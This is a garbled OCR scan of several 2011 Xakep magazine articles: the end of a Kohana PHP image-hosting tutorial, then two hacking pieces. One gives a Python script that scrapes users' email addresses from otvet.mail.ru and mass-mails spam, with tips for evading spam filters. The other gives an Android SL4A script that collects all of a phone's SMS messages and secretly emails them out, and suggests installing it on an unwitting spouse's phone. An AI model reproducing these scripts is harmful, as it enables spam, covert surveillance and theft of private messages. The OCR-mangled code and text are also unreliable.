только то, что расположено между тегами <ИЩе>. Там я отправляю 

на «печать» значение одноименной переменной. Получается, что 
заголовок страницы будетустанавливаться извне — из контроллера. 
Теперь посмотрим на обновленный код ранее рассмотренного нами 
контроллера: 


фабоц{ раде = \1ем: : Расфогу ("'абои*'); 
фабоц*_разе -> +1+1е = 'Это страница абоц*"'; 
$115 -> гезроп5е -> Бо4у ($абои*_разе); 


В первой строке я связываю переменную абоц(_раде с представле- 
нием абоц*. Для этого я использую конструкцию Ме\м/: Гасфогу. Далеея 
устанавливаю переменную И и вывожу само представление. 


Хостингизображений 


Я долго думал насчет примера для сегодняшней статьи. Обычно 

при обзоре фреймворков пишут блогили другое типичное мер- 
приложение. Признаюсь честно, сначала ятак и сделал — набросал 
блог с простой системой авторизации пользователей, админкой ит.д. 
Но потом подумал [вообще-то это я тебя насильственно переубедил 

:] — прим. ред.) что это скучно и решил сделать что-нибудь поинте- 
ресней. В итоге придумал рассмотретьтакое приложение, как хостинг 
изображений. Таких проектов в инете пруд пруди, и несмотря на 
многообразие выбора, каждый имеет свою аудиторию. 

Я понимаю, что для более-менее реального личного хостинга изо- 
бражений нужно несколько гигабайт места. На обычном виртуальном 
хостинге получить их дороговато, а разтак, то и пользы оттакого 
хостинга будет мало. Итутя подумал, а почему бы не заюзать в ка- 
честве хранилища отдельный аккаунт известного всем ОгорБох? По 
умолчанию каждый акк позволяетхранить 2 гигабайта стаффа, но его 
без особых проблем реально прокачать до восьми. А вотвосемь гиг 
вполне хватит для использования в личных целях. Немного покумекав 
и вочередной раз задержав статью, я набросал небольшой проект. Я 
не стал сильно извращаться, а реализовал лишь: 

® Удобную загрузку изображений. На большинстве опробованных 
мной хостингах изображений для отправки файлов требовалось 
выбрать нужный файл при помощи стандартного диалога открытия 
файлов. Это не очень удобно, тем более, возможности НТМЕ5 легко и 
просто помогают реализовать Огад&Огор-интерфейс и считать файлс 
компа пользователя при помощи ЕЦеАР!. 

® Передачу файлов в ОгорВох. Для хранения файловя выбрал предо- 
пределенную директорию рибИс. Все хранящиеся в ней файлы могут 
быть расшарены для других пользователей. Огорбох автоматически 
генериткним ссылки. Именно эта ссылка и будет использоваться для 
передачи клиенту. Да, конечный адресок получается длинноватым, но 
при желании его можно укоротить. Сервисы для укорачивания ссылок 
тебе в помощь. 
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Таусц*.рир _ масоме.рИр 
радез/ ргодисз.рйр 


| Е. ме\сопе. 
о _ ргодисе$.рИр 
‘еггог404.рпр 


Иллюст рация наследования ресурсов 


Внутренности проекта <$сг1ре згс="Ит15ир1оадег.]5"></5сг1ре> 


Увы, привести полные листинги проекта в статьея не могу, по- </веаа> 

скольку кода (особенно оформления] достаточно много. Здесья 

лишь поясню основные ключевые моменты. Итак, начнем разбор с <Боду оп1оад="пем ир1оааег ( "агор', 'зЖафи$', 'ир1оааег.рИр', 

контроллеров. Для проекта мне потребовался один контроллер, одно Е 

представление и одна модель. В контроллере я объявил два метода- <а1\ 19="Бох"> 

события. Первое возникает, когда пользователь обращается к основ- <41\ 14="5%афи$" >Перетащи на меня файл</41\> 

ной странице, а второе — в случае успешной загрузки изображения <а1\ 14="агор"></91\> 

на сервер [генерируется страница со ссылкой на файл). </а1м> 

Первое представление — самое простое. По факту, это — страница <а1\м 14="115%"></41\> 

с небольшим полем, на которое нужно перетаскивать файлы. Код </Боду> 

страницы прост до безобразия: </Ит1> 
< !БОСТУРЕ Н&т1 > В коде я определяю простенькую разметку и подключаю готовую би- 
<ИЕт1 > блиотеку пит ироадег В этой .)5-библиотеке уже реализовано все 
<«Неад> необходимое для создания красивой {п [5-страницы для передачи 
<тефа спагзе*="и+-8"> файлов на сервер. Для передачи файла достаточно забиндить на со- 
<{1{1е>Демонстрация работы СМЕ КоНапа для ][акера‹ /+141е> бытие оп[оад создание экземпляра объекта ироааег. 
<14пКк Ние+="<$у1е.с5$" ге1="5фу1езНеет" суре="фехЕ/сз$" /> В конструктор объекта необходимо передать следующие параметры: 


ХАКЕР 08 /151/ 2011 » 105 


7$ Пизегз\Корапа-3.1.3.1\Ковапа-3.1-плазег-10\ подше5\ огпл с 1а5525\Копапа\ оггл.рЮр - Мобера 9+ + . 
Файл Правка Поиск Вид Кодировки Синтаксис Опции Макросы Запуск ТежРХ Дополнения Ожна ? х 


| ЭН ® 58| 4 |2 ев | 4 |5 ныыЕ|вныУ 


51 * @ргорег!у гид Фсгесед сои С 

62 "/ = 

53 ([Нс1аз= Ковапа ОВМ ехеептЯ= Ио4е1 ур1етепт&= зес1а1129а51е ({ 

64 

65 а 

66 = З1огез сомил ииФогиьоноп Фог ОМ тодеб 

57 * @уаг аггау 

58 "/ 

Ба ргофесфеЯ зфаё1с $ сом сасне = аккау(); 

70 

ии! вы 

72 * соЙоЫе фаоБазе теНод5 

73 > ог оггау 

74 ыы 

75 ргобескеЯ зфаё1с $ 96 шесно@з = аггау 

76 { 

77 'увеге', 'апЯ чнеге'!, 'ог чНеке!, 'увеге ореп', 'апЯ увесе орен', 'оЕе увеге ореп', 'увеее с10о8е', 

78 ‘ап ывеге с10о3е', ‘ог увеке с1о3е', '913511с0', '3е1есс', ‘Геос, '3)0210', ‘ой', 'дЕОПр Бу', 

та 'Вау1по', ‘апа Вау1па’, ‘'оЕ_вВау11о’, ‘Вахта ореп’, 'апЯ пПау1по ореп’, ‘ое Вау1та ореп’, 

50 'Вау1п9 с105е', 'апа Вау с1о5е', 'оЕ_Вау119 с105е', 'ог4ее Бу', '11010', 'ОЕЁ5ес', 'сасвей', 

81 }; 

82 

83 ре 

83 = АетЬегх Ша! Номе дссе5$ тео 

85 * Е лаг аггау 

ы „) =| 

|РНР НурецехЕ Ргергосез5ог @е: ПБ саг: 38474 п:1 С9:1 58:0 имх [АМТ № д 


Внутренности фреймворка: реализация ОКМ 


1. '4 блока, на который пользователь будет выполнять перенос изо- 
бражений; 

2.14 блока для вывода статусных сообщений; 

3. путь к сценарию, выполняющий передачу файлов от клиента на 
сервер; 

4. 14 блока для вывода списка загруженных файлов. 

Последний параметр можно не заполнять. Обрати внимание, к 
данному В1т[-файлу я прилинковал 5{Уе.с$$. В нем содержится 
описание стилей. Если ты попытаешься повторить пример, то обя- 
зательно копирни с5$-файл, иначе твоя страницатак и останется 
девственно чистой. 

Теперь посмотрим, как работать с Огорбох. Как всегда есть два 
варианта. Первый — гиковский. Думаю, ты уже догадался, что 
придется все писать самостоятельно. Второй проще и правиль- 
ней — воспользоваться готовым модулем. Пока таких модулей не 
очень много. Для себя я выбрал самый простенький, который таки 
называется — ОгорбохОроа4дег. Ссылку наего загрузку ты найдешь 
в конце статьи. 

Модуль представляет собой класс с одним полезным методом — 
ир[саа. Передача файлов в аккаунт ОгорВох‘а выполняется следую- 
щим образом: 


фир1оааег = пем Огорбохур1оадег( 'твой_логин', 
'твой_пароль’); 
фир1оааег->ир1оаа( 'файл для загрузки", 'папка назначения '); 


Поскольку я решил загружать все файлы в папку риб(с, то в качестве 
второго параметра мне требуется передать — /рирЬйс. Если необхо- 
димо загружать файлы прямо в корень аккаунта, то указывай просто 
РЕ ==” 

Код приемки файла на стороне сервера выглядит следующим об- 
разом: 


1+(сочп*($_ЕТЬЕ$) >90) 
{ 


фир1оааег = пем ОгорбохУр1оадег( '1о021п', 'ра$5'); 
фир1оааег->ир1оаа( 
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фир1оаа_+о1аег.'/'.$_РТЕЕЗ['ир1оаа' ] [ 'пате'], 
$Агорбох_+о1аег); 


1+ (тоуе_ир1оадеа_#1е($_ЕТЬЕ$['ир1оаа' ] [ "Етр_пате' ] , 
фир1оаа_+о1аег.'/'.$_РТЕЕ$['ир1оаа' ] [ 'пате'] )) 


есйПо 'аопе'; 


фир1оааег = пем ОгорбохУр1оадег( '1о081п', 'ра$5'); 

фир1оааег->ир1оаа( 
фир1оаа_+о1аег.'/'.$_РТЕЕЗ['ир1Тоаа' ] [ 'пате'], 
$Агорбох_+о1аег); 


ех1*(); 


Здесья привел код считывания файла с использованием глобально- 
го массива $_РЕИШЕЗ. С ним очень удобно и просто работать, но стоит 
помнить об одном маленьком условии — браузер клиента обязан 
поддерживать метод передачи файлов — зепдАзВтагу(). В против- 
ном случае тебе придется самостоятельно декодировать полученные 
данные из Базе 64 [если они были закодированы именно этим алго- 
ритмом). Я реализовал оба варианта. Второй ты можешь посмотреть 
в моем исходнике. 


Заключение 


Фреймворки существенно облегчают процесс разработки миеВ- 
приложений и прививают разработчику «культуру разработки» 
помогают писать более красивый и правильный код. Рассмотренная 
Корапа обладает весьма привлекательными возможностями и уже 
из коробки содержит готовые решения длятипичных задач. Попро- 
буй начать использовать Копапа в реальных проектах. Уверен, ты 
прочувствуешьее мощь и гибкость и уже не захочешь возвращаться 
на голый рйр. На этом кланяюсь и желаю тебе удачи. Как обычно, все 
свои вопросы можешь кидать на мыло. == 
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реклама 


РР МВ 990 


ЕР -— заряжает мобильность и качество 


ЕЭР СРОЧР 


Компания Е5Р 

приготовила Вам подарок 
к отпуску — новый сетевой 
адаптер для ноутбука 
Е5Р МВ 6990! 


Высокая производительность, надежность, 
практичность, мобильность, безопасность 


Официальные дистрибьюторы Е$Р в России: и, конечно же, элегантность сделают 
наш адаптер Вашим постоянным спутником. 
Коосо 0С$ о! Возьмите адаптер Е5Р МВ @90 с собой в дорогу 
ООС: ыы вместо громоздкого и тяжелого оригинального 
МИМ/М/.КоОЗОО. ГИ МИМИМ/. ОСЗ. ГИ +7 (495) 221-1111 
МИА ОТО. ГИ сетевого адаптера. Ваше путешествие, работа 


и отдых станут еще более комфортными! 


\\М/\М.15р-ро\мег.ги 


Ш № Александр «Бег егзсВ» Перечнев [ммм .регесвпеу. сот) 


СПАМИМ 


ОТВЕТЫ @МА!. ВО 


Используем невнимательность руководства 


Нтаг.ги в своих целях 


©К сожалению (а может быть, и к счастью), создатели даже 

в самых крупных сервисах допускают просчеты. В этой статье я 
расскажу, как с помощью одного из них устроить себе бесплатную 
таргетированную рекламу, со страшной силой залетающую на 
почтовые ящики посетителей о{уе{. тац.ги. 


Предыстория 

Однажды мне потребовалось привлечьновых посетителей на форум. Гак 
как форум был чисто экспериментальным и бесперспективным, вклады- 
вать деньги в рекламуя не хотел. Поэтому первое, что пришло мне в голову 
— попробовать немного попиаритьего на ое. тац.ги. После отправки 
пары-тройки ответов со ссылкой на мой сайтмодераторы тутже удалили 
сообщения и запретили мне доступ к ресурсу. Я зарегистрировал новый 
аккаунт, но продолжать втом же духе было сущей глупостью — мне пред- 
стояло хорошенько подумать над автоматизацией этого процесса. 

Итак, первое, что я сделал — нажал в браузере заветную комбинацию 
<СгГ(+и> и стал читать НТМЕ-код страницы. В начале следовали стан- 
дартныетэги, совершенно мне не интересные. Далее яувиделтексттех 
самых вопросов, которые задают пользователи, итутже мне на глаза 
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стали попадаться какие-то етаЦ-адреса. В голове промелькнула мысль: 
это могут быть адреса пользователей, задающих вопросы. Вниматель- 
ный просмотр главной страницы сервиса подтвердил мои догадки, после 
чего я открыл свой дедк и стал кодить. 


Пишем скрипт 


Программировать мы будем на Руоп. Еслиты никогда не работал с ним 
— не пугайся. В рамках статьи все будет очень просто. 

Для начала давай соберем все ета(-адреса с главной страницы какого- 
нибудь раздела сервиса. Для этого нам потребуется модуль «иИБ» 

для загрузки веб-страниц посредством НТТР и модуль «ге» для работы 
срегулярными выражениями. Подключим их в самом начале нашего 
Руоп-исходника: 
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поискомай.го 
Сейчас ищутв Интернете: 
ГДЗ 
рик 


Разоблачения от Навального 
РосПил 
ечь Парфенова 
буквоед 
фк зенит 


Новости проекта 


ет Ч Г 


БЕЕр:/Млп.гпай.гу/с9!- Мп/зеггтз9?То={апеКа_зап@гпай.ги& 


Тот самый ета! пользователя 


1трог* иг1116 
1трог* ге 


Далее сценарий работы предельно прост: открываем меВ- 
странцу, ищем на ней все мыльники и используем их в своих 
целях. На питоне это будет выглядеть следующим образом: 


ий11е Тгие: 
и = ч"1116.иг1Тореп("ПЕЁр: //о%\е* .та11.ги/1/") 
разе = и.геаа() 
ета11Ра{егп = 
г" [0-9а-2А-7_\-\. ]+@[9-9а-2-А-7\. ]+.[а-2А-7]+" 
сотр11еаРа**егп = ге. сотр11е (ета11Ра{егп) 


фог адаге$$ 1п сотр11едРаЕегп.#паа11 (раёе): 
# Делаем что-нибудь 


Поадресу ВИр://о{ме{. глаЦ.ги/И/ размещаются все вопросы, 
связанные с компьютернымитехнологиями. Еслиты, напри- 


мер, захочешь получить ета(-адресалюдей, интересую- 
щихся спортом — замени его на В р://о{\уе{. ппай.ги/зроги. 
Далее впеременную етаЦРаКегп мы помещаем регулярное 
выражение, содержащее шаблон ета(-адреса. О том, как 
строятся регулярные выраженияя рассказывать не буду 

— этатема выходитза рамки статьи. Просто вбей в боод[е 
соответствующий запрос и узнай о регулярных выражениях 
все, что твоей душе будетугодно :}. 

В следующей строке мы компилируем регулярку вудобный 
для интерпретатора вид и подходим к заветной конструкции: 


фог адаге$$ 1п сотр11едРаЕегп.#п4а11 (раёе): 


В данной строчке в первую очередь выполняется метод 
Чода( объекта согпрЦеаРа(егп. Данный метод ищетвсе 
строки в параметре раде, которые соответствуют заданному 
нами регулярному выражению. В нашем случае метод ИпдаЦ 
вернетсписокета(-адресов, содержащихся на странице 
БЕр://офуе.ппай.ги/ИИ. 

Блок, находящийся под строкой Юг <значение> п <кол- 


лекция>, выполнится столько раз, сколько егпа(-адресов 


ХАКЕР 08 /151/ 2011 


О ответы@май, Ви: Челове... | 


@ Анна Чуносова Я — О ответов нет 16 секунд наза 


Какой род до в Минске самый лучший? .. Бере 


@ Евгения Лепкова @ С ответов нет 20 секунд на 


Как в домашних условиях отличить спред отн 
@ Юрий Шумланский 9 О ответов нет 


23 секунды 


Задача по физике про электрический ток _ ВУ: 


@ Мес @ — СО ответов нет 23 секунды назад 


дайте ссылку на сейв на то${ м/атще до баро 
@ |цап Шоре?2 де Сеагуагиез Сауадега @ С ответов нет 


ьен в оволно ? Кто-то 
@ Танека Бонда @ — С ответов нет 


обовал-з 
24 секунды наз. 


фгогп= овие{ 


содержится на странице, и при каждом проходе в перемен- 
ной а агез$ будет содержаться адрес очередного почтового 
ящика. Это значит, что в этом блоке и будут совершаться 

все злодеяния, которые только способны прийти нам в 
голову. Давай будем отправлять на каждый почтовый адрес 
«нежелательное» сообщение. Для этого инициализируем 
несколько глобальных переменных, расположив их между 
главным циклом и импортом библиотек: 


$тЕр_зегуег = "зтёр.та11.ги" 

$тёр_роге = 25 

$ТЕр_аЧаге$$ = "п1сКпате@та11 .ги" 

тер _раз$мога = "раззм@га" 

та11 Фор1с = "Спам сообщение" 

та11 Бо4у = "Здравствуйте, я прислал вам 
спам-сообщение. Добавьте меня, пожалуйста, 
в черный список. " 


Здесьу нас все предельно ясно — названия переменных 
говорят сами за себя. Теперь реализуем непосредственно 
отправку сообщения адресату. Для ЭТОГО добавим кое-что в 
список импорта: 


1троге $тЕр11Ь 
{гот ета11.МТМЕТехе 1трог{ МТМЕТех* 


‚.ивпишем нижеследующий код в блок конструкции «Тог- 
шп», чтобы он выполнялся для каждого найденного ета(- 
адреса: 


158 = МТМЕТехЕ (та11] Бо4у + а9аге$$, "", "и+-8") 

158[ 'Егот'] = змЕр_аааге$$ 

158[ 'То'] = адаге$$ 

158[ '5иб]ес*'] = ета11_ Фор1с 

та115егуег = тЕр11Ь .5МТР ( зтЕр_5егуег, этЕр_ роге) 

та115егуег. 1021 п (тЕр_ааге$$, зтЕр_ра$$мога) 

та115егуег. зепата11 (зтЕр_адаге$$, ад4ге$$, 
158.а$_5%г1п2()) 

та115егуег.с10$е() 

и5еЕта11$ . аррепа(адаге$5) 


|мЕО. 
р по 


Даже такой простой 
скрипт в течение двух 
месяцев приносил 
мне от 100 посети- 
телей в день в зави- 
симости от раздела. 
Сейчас спам-фильтры 
немного поумнели, 
но для их обхода до- 
статочно рекоменда- 
ций из абзаца «Обход 
спам-фильтра». 


› ЧУЧ 


Полный исходный код 
скрипта ты найдешь 
на диске, который 
идет вместе с жур- 
налом. 


| МАВММб_ 


› ммагпа 

Эта статья — всего 
лишь адекватная 
реакция на наплева- 
тельское отношение 
руководства тац. 

ги кданным своих 
пользователей. Вся 
информация — впол- 
не общедоступная и 
ничего противозакон- 
ного в ней нет. 
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Создать почту 


| 


еогваниченныйи со ъем, защита от еп 


Пе |= 


Регистрация в почте 


| Войти ] 


я 


Знакомства ® 


Ш Чужой компьютер 


(©) 


® Э 


Мой мир Агент 
(© Приложения ©=5 Видео 
А Гороскопы $ Открытки 
8 Новости 2х Погода 


ИТАН А 


[== 
Нам рассказывают про защиту от спама : 


ВА Олллвамьна 


В самом коде ничего сложного нет: мы лишь создаем етац(- 
сообщение и отправляем его на почтовый ящик, содержащийся 

в переменной аЧагез$. В идеальном мире скрипт можно было бы 
запустить на выполнение уже сейчас. Но есть одно «но», о котором 
стоит поговорить отдельно. 


Обход спам-фильтра 


Если ты будешь каждую секунду слать одинаковые сообщения на кучу 
адресов, то спам-фильтрам не составиттруда тебя обезвредить. Один 
из вариантов — слать сообщения с одного аккаунта с интервалом 20-25 
секунд. Для этого достаточно добавить в цикл строку: 


{1те.51еер(25) 


И импортировать соответствующий модуль для работы со временем: 
1трог* %1те 


Вторым шагом можно добавить разные синонимайзеры и рандомай- 
зеры, чтобы все отправляемые сообщения были совершенно раз- 
ными по своему содержанию. Также можно еще больше увеличивать 
интервал между отправкой сообщений с одного аккаунта, увеличивая 
количество потоков и самих аккаунтов. Используя эти нехитрые трю- 


Спам-скрипт начал свою работу 


А ИЕ печати 
пегНесспо<еь 


Файл Правка Вид Терминал Справка 


Кег{1е1 зсН@деБ: ап: -/Загрузки$ руНоп эратег.ру 


(1, 'зфаф1$4236@таа (.ги') 


(2, 'К11гоз@та11.ги') 
(3, 'зрудег_зегде1 @БК.ги') 
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т 1:4 ИИ | 


им да 


Сейчас ищут: М ев и Путин в шортах у 


№5 ал Моте. Каждый день - особен! 
В салонах дилеров М5 зап 


Новости Авто`! Афиша `' НЕТеск^' Леди”! Иг 


Вечером в среду на Земле произойде 


[2] 


Сергею Иванову показали чипсет для ГЛОНАСС 1] 


® Россиянам изменили правила оплаты услуг ЖКХ 
Взрывы АЗС: один человек. 


Ф 
® Прогноз погоды предсказывает вспышку холеры | 
» Кинодиве всех времен 851 7125, 

За ночь в Москве сохокено семь иномарок 
Стоит ли вернуть в УК статью за безделье? 


Санкт-Петербург 
® ЮНЫ неядцы из Петербург 


бивают людей 


ки, мне удавалось привлекать от 150 до 400 новых посетителей на фо- 
рум каждый день. И эти цифры можно увеличить во много раз! Зайди 
на главную страницу сервиса ВЦ р://о{\е{. паЦ.ги и обрати внимание, 
сколько посетителей сейчас онлайн. На момент написания этих строк 
их было 19 998. Практически 20 тысяч посетителей — и каждый изних 
так и ждет оттебя сообщения на почту :]. 


Заключение 


Как видишь, руководство сервиса о\е{. таЦ.ги не особо беспокоится 
о спаме в почтовых ящиках своих пользователей. К слову сказать, у 
Соод(е и Уапоо есть аналогичные проекты, нотам адреса не раскры- 
ваются ни при каких обстоятельствах. Может, администрация «наци- 
ональной почтовой службы» задумается о существующей проблеме, 
но пока что есть возможность если не спамить, то хотя бы собирать 
егпа(-адреса в базы данных, чтобы использовать их в будущем. 
Такая база будет иметь цену хотя бы потому, что она содержитадреса, 
сгруппированные по интересам их владельцев. На своем опыте могу 
сказать, что обход спам-фильтров тоже не является сколько-нибудь 
сложной задачей: разделяй и властвуй! Тьфу, нета пословица. Я 
хотел сказать, конечно «рандомизируй и синонимизируй» :]. Нуи 
напоследок: обрати внимание на сервис ту. гпа.ги. Страницы этой 
социальной сети тоже кишат пользовательскими мылами. Делая воз- 
можным поиск по интересам, возрасту и месту проживания. == 


о о 


т “Загрузки 
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КРУПНЕЙШИЙ В РОССИИ 
ЖУРНАЛ ОБ ИГРАХ 
ТОЛЬКО ДЛЯ ПЕРСОНАЛЬНОГО 
КОМПЬЮТЕРА 


. в 
з 
р. . о р 
ая р ЕЕ, ей а ау ея я 
ыы Г , С Е, в | у: 
= И ый. м. АЕ [У {. ГИ 
т 


У 
‚= _ = — ‚ АВГУСТ 
о АНИ ВЫ 
| - ами Л ЮТ| ‚РР ЫХ ИГРАХ. 
Зы У 


| 


РЕВОЛЮЦИОННЫЙ 
ДЕТЕКТИВ - ТЕПЕРЬ 
ИНАРС 


РиБНаНавЯ ый еек : 7 | |] 
ДИ 0 


Реклама 


\ 


О КОМПЬЮТЕРНЫХ ИГРАХ - СО ЗНАНИЕМ ДЕЛА 
БЛАГОДАРЯ ЖУРНАЛУ «РС ИГРЫ», ВЫ ВСЕГДА СМОЖЕТЕ ПОСОВЕТОВАТЬ ДРУЗЬЯМ... 


{Ф ЛУЧШИЕ НОВИНКИ <® САМЫЕ ОЖИДАЕМЫЕ ИГРЫ «® ОПТИМАЛЬНЫЕ КОМПЛЕКТУЮЩИЕ ДЛЯ ПК 


Ш № Михаил «М! ${огт» Овчинников (п${огт90@дтаЦ.сот) 


$спрйпа 
Гауег 
Тог Апагоа 


оМъ-ПОХИТИТЕЛЬ 


ДЛЯ АМОКОФ 


р 


ОСИ 


разработки для 


ефона 


© Устройства на базе 0С Апдго!Ч завоевали большую популярность и 
привлекают к себе все больше внимания. К сожалению, кодинг под 
эту платформу требует определенных специфических навыков и зна- 
ний. А ведь часто бывает нужно всего лишь накидать небольшой 
скрипт на любимом Ру{Поп или Вибу! ЗЕ ДА готов помочь тебе в этом. 


Преамбула 

51 4А представляет собой среду разработки для мобильных телефонов 
на базе Апаго!а. Она позволяет создавать, редактировать и выполнять 
скрипты на следующих языках: Руоп, Рег! /Кибу, Гца, ВеапЪВец, 
]ауа$спри, Гс(. Также в ней реализовано АР!, которое дает доступ 
практически ко всем функциям и параметрам системы Апагола, и даже 
позволяет создавать элементы пользовательского интерфейса. Таким 
образом, мы имеем возможность писать относительно полноценные 
программы для данной платформы на привычном языке программи- 
рования. Как видишь, перед нами не просто текстовый редактор плюс 
командная строка, а полноценная платформа, на основе которой при 
желании можно серьезно расширить функциональность своеготеле- 
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фона. Проект открытый, и имеет вокруг себя относительно крупное и 
активное сообщество. Несмотря нато, что на момент написания статьи 
данный продуктеще находился ва(рва-версии, на нем реализовано 
некоторое количество весьма интересных вещей. Например, управ- 
ление роботами при помощи мобильного телефона, подробнее можно 
узнать об этом в блоге се(Бо{5.согп. 


Установка 


Она происходит в два этапа: сначала нужно скачать и установить саму 
ЕДА, затем из-под нее инсталлировать ап9го!а-версию нужного 


тебе скриптового языка. Скачать арк-файл можно на сайте проекта 
(см. врезку), либо воспользоваться ОК-кодом. Следующим пунктом 
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© Вео мог|а 


пе|о мога 


Здороваемся с миром из Рутоп 


нужно установить приложение, предварительно включив 
в настройках «Доверять неизвестным источникам». По- 
сле запуска мы увидим перед собойтемное окошко безо 
всякой дополнительной информации. Вызываем меню 
ивыбираем \е\м/- т(егрг&егз. В данном случаеу нас 
будет доступен только Пе - командная строка, в которой 
выполняется большинство ипих-команд. Чтобы установить 
интересующий тебя скриптовый язык, опять вызывай 
меню, нажимай Ада, и перед тобой предстанет список до- 
ступных языков. Выбор любого из них приведетк скачи- 
ванию установочного арк-файла. Меня интересуетязык 
Ру{Фоп, поэтомуя выбрал и установил его. Такжеты можешь 
скачать любые необходимые файлы на сайте проекта, либо 
забрать их сдиска. После установки втелефоне появит- 

ся приложение Ру{Поп ТогАпагона, запустив которое, ты 
увидишьединственную кнопочку «|п${аЦ», по нажатию на 
которую, программа скачаети распакует все необходимые 
ей файлы. Теперь, если снова зайти в 51 4А, ты обнару- 
жишь, что в ней появились несколько весьма полезных 
примеров скриптов на Ру{Воп. Теперь можно со спокойной 
душой приступать к самому интересному - кодингу. 


Нео М/опа! 


Несмотря нато, что написание НеЦо \\оп4 — занятие не- 
сложное практически на любом языке программирования, 
я рассмотрю данный пример стой целью, чтобы разъяс- 
нить некоторые особенности работы в программе. Давай 
снова зайдем в список интерпретаторов (Меню -» Мем/ 

>> егргег<}, таму насуже должен появиться РуУоп. 
Запустим его, откроется привычная командная строка, где 
ты можешь написать ргп{ "НеЦо мог" и убедиться, что 
все работает. 

Аналогичным образом ты можешь выполнять любые 
команды, а когда наиграешься — закрывай терминал 
командой ех{[ и будь готов капельку усложнить пред- 
ставленный пример. Вернись из меню интерпретаторов 
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ОВ-код для 54А 


в основное окно, вызови меню, нажми Ада -> Руогп, и 
программа создастнам новый ру-файл, в котором по 
умолчанию будут следующие строки: 


1троге апаго1а 
го14 = апаго1а.Апагота() 


Смысл их, думаю, понятен: импортируется модуль, предо- 
ставляющий функционал работы с системой, и создается 
объектаго!а. Теперь — самое интересное: мытакже можем 
написать в файле ргт{ «НеЦо м/ог@», а можем вывести ПеЦо 
м/ог[а в системном ае“{-окошке при помощиАР!. Код для 
этого будет выглядеть следующим образом: 


1трог* апаго1а 

Дго1А = апаго1а.Апаго1а () 

# здороваемся обычным способом 
В = "Бе]1о мог1 9" 

релиЕ п 

# здороваемся при помощи АРТ 
го1а.91а1о=СгеаеА1ег* (п, 1) 
го1а.91а1о=5Пом() 


Результатвыполнения этой программы можноувидеть на 
скриншоте. Оаод9Сге{еДе[ имеетдва параметра: за- 
головок итело сообщения. Также уведомить пользователя 
можно быстрым и небольшим сообщением ппаКеТоа<! («Твое 
сообщение»). 

Таким образом перед нами предстает простая и мощная 
система для построения собственных приложений илина- 
писания скриптов для облегчения каких-либо повседневных 
задач, при этомтебе ничего нетребуется, кроме собствен- 


ного телефона! Чтобы облегчить нам жизнь, разработчики 
встроили АР! гом/ег, при помощи которого можно быстро 
находить и добавлять необходимые команды. Чтобы до- 
бавитьтребуемую команду, нужно задолбить ее долгим нажа- 
тием, ивпоявившемся меню нажать <пзец>. Таким образом 
создание даже довольно сложных скриптов не покажется 
тебе особенноустрашающим. Теперь, для закрепления прой- 
денного материала, рассмотрим «боевой» пример. 


5М5-вор 


Предлагаю для практики написать скрипт, который со- 
беретвсе 5М5 у незадачливого пользователя и отправит 
их нам на почту. 


[2у0 


› ЧУ 
Все сорцы к статье 
ждут тебя на нашем 
диске. 


| НТТР://ММИМ 


› ИпК$ 

Сайт проекта: 
ВЕр://соде.доодц(е. 
согп/р/апаго- 


эсгрУпо/. 


| МАВММ6_ 


› магпттд 


Все действия опи- 
саны исключительно 
в образовательных 
целях, автор и редак- 
ция не несут никакой 
ответственности за 
твои действия. 


> 113 


СОПМС 


1, ©) 12:31 


(ед Б|цеоо{_спа{.ру 
(ед пе|о_м/ога.ру 
(ед пору меаШег.ру 
(ед сау_спа(.ру 

(ед сау_Ите.ру 


(ед сау_\ммеаег.ру 


(ед зреак.ру 
(ед ({аке_рисиге.ру 


(ед (е5{.ру 
(ед (е5Ип?.ру 


1трогЕ апдго1а, $тЕр116, 0$ 
го14 = апаго1а. Апаго1 а () 


та11+гот = "откуда отправлять" 
та11$о0 = "куда отправлять" 


11пе$ = 
ге5и1* = аго1а. зтбе{Ме5аве$ (Еа15е) 


Рог Ета рези [1] 
Фог уа1ие 1п Ф.уа1ие$(): 

11пе$ = 11пе5+$%г (уа1ие.епсоае ( 'и*+-8'))+ '\п' 
рг1п* 11пе$ 


та115еп4 = 5тЕр116.5$МТР("5тЁр.5та11 .сот" , 587) 
та115$епа.еН1о() 

та115епа. 5ФагЕ{1$() 

та115$епа.еН1о() 

та115епа. 1051п (та11гот, "пароль от ящика") 
та115епа. зепата11 (та11Ргот, та11%о, 11пе$) 
та115епа.с105е() 


Как видишь, скрипт получился довольно простым. Давай пробежимся 
по нему и разъясним основные моменты. В переменные тагот и 
гла!ю нужно забить адреса ящиков, с которыхты будешь отправлять 

и на которые будешь принимать письма, соответственно. Затем при 
помощи команды т бе{Меззаде<(] забираем сообщения. В качестве 
параметраей надо указать, передавать ли только непрочитанные 
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25 1 & 11:05 
РУу{Поп 2.6.2 (г262:71600, Маг 20 2011, 1 
6:54:21) 

[6СС 4.4.3] оп 1пих-агтуб1 

Туре "Пе]1р", "соруг1епт", "сгеа1{$" 
]1сепзе" Тог тоге 1пТогтат1оп. 

>>> рглпЕ "пе11о уюг1а" 


Ре!1]о \мюг1а 


>>> [ 


(Тгие}, или все сообщения (Ра($е). На будущее замечу, что у данной 
функции также есть и второй, необязательный параметр: пБох (по 
умолчанию] — из какой папки читать сообщения, в данном случае — 
входящие. После выполнения в переменную гезий запишется список, 
который состоит из списка словарей. Звучит запутанно, поэтому 
смотри код. Первый список — гезий, список 5М$ содержится в первом 
его элементе, поэтому в дальнейшем я работаю только со списком 
гези{ 1], в котором каждый элемент — это словарь, а каждый словарь 
содержит $М5, номертелефона и |0 сообщения. Ключи меня не сильно 
интересуют, поэтомуя извлекаю только значения из каждого словаря 
и записываю их в строку, которая затем будет отправлена по почте. Для 
отправки по почте в АР! $14 А есть команда зеп9Ета{(), но онатребует 
участия пользователя, который вряд ли захочет, чтобы его входящие 
ЪМ5 отправились неизвестно кому. Поэтому подключаем при и 
отправляем письмо самостоятельно. Ты можешь отправить это письмо 
самому себе или на другой ящик. 
[детакой пример можетпригодиться? Допустим, ты частный детектив, 
и очередная ревнивая жена попросила выяснить, что пишутее мужу 
юныелюбовнинцы. Данный скрипт можно преобразовать в арк-файл 
(подробности здесь: 

}, установить втелефон нерадивому супругу, ажене на по- 
чту будут приходить все планы будущих прелюбодеяний :). 


Заключение 


Помимо эсэмэсок, аналогичным способом при помощи АР! (вся необ- 
ходимая инфатакже есть на сайте проекта) можно выцепить из памяти 
телефона историю звонков, список контактов и многое другое. Думаю, 
что я уже далтебе достаточно информации для твоих изощренных 
кодерских фантазий, дерзай комрад! == 


ХАКЕР 08 /151/ 2011 


МАКС ГАК 
ОТО] МАННГУЛЯЦИИ 


6 номеров 564 руб. б номеров 785 руб. бномеров 1110 руб. 6 номеров 810 руб. 
